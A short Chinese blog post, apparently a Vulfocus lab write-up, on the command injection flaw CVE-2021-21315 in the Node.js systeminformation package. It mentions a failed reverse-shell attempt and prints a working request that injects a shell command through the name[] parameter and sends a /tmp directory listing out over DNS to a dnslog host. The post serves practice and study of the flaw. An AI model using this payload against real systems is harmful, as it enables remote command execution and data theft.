Vulfocus靶场 | node.js 命令执行 (CVE-2021-21315)

漏洞描述

Node.js库中的systeminformation软件包中存在一个命令注入漏洞(CVE-2021-21315)攻击者可以通过「systeminformation」中代码注入漏洞的存在意味着攻击者可以通过在组件使用的未初始化参数内小心翼翼地注入有效载荷来执行系统命令。

漏洞复现

本来想反弹VPS,但是因为一些特殊符号导致写入不成功

这里借助到dnslog

 

执行

 

http://123.58.224.8:51786/api/getServices?name[]=$(ping%20`ls%20/tmp`.k6ywku.dnslog.cn)

 

 

flag:

 

 

 

 

 

posted @ 2022-08-20 22:44  mlxwl  阅读(594)  评论(0编辑  收藏  举报